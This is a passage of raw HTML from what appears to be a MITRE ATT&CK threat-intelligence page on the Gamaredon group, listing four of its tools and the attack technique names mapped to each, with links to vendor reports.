href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr></tbody></table></div><h2 style="line-height: 1.44; margin-top: 0pt; margin-bottom: 4pt;"><span style="font-size: 17pt; color: rgb(57, 67, 76); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"><b style=""><font>Software</font></b></span></h2><div style="margin-left:0pt;" align="left"><table style="border:none;border-collapse:collapse;"><colgroup><col><col><col><col></colgroup><tbody><tr style="height:37.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">ID</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Name</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">References</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Techniques</span></p></td></tr><tr style="height:43pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0097"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">S0097</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0097"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ping</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1018"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Remote System Discovery</span></a></p></td></tr><tr style="height:55.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0685"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">S0685</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0685"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">PowerPunch</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">PowerShell</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1480"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Execution Guardrails</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1480/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Environmental Keying</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ingress Tool Transfer</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1027"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Obfuscated Files or Information</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1027/010"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command Obfuscation</span></a></p></td></tr><tr style="height:96.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0147"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">S0147</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0147"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Pteranodon</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1071"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Application Layer Protocol</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1071/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Web Protocols</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1547"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Boot or Logon Autostart Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1547/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Registry Run Keys / Startup Folder</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Windows Command Shell</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Visual Basic</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1074"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data Staged</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1074/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Local Data Staging</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1140"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Deobfuscate/Decode Files or Information</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1041"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Exfiltration Over C2 Channel</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1083"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File and Directory Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1070"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Indicator Removal</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1070/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File Deletion</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ingress Tool Transfer</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1106"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Native API</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1027"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Obfuscated Files or Information</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1027/007"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Dynamic API Resolution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1053"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Scheduled Task/Job</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1053/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Scheduled Task</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1113"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Screen Capture</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Binary Proxy Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1218/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Mshta</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Binary Proxy Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1218/011"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Rundll32</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1497"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Virtualization/Sandbox Evasion</span></a></p></td></tr><tr style="height:69.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0686"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">S0686</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0686"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">QuietSieve</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1071"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Application Layer Protocol</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1071/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Web Protocols</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; 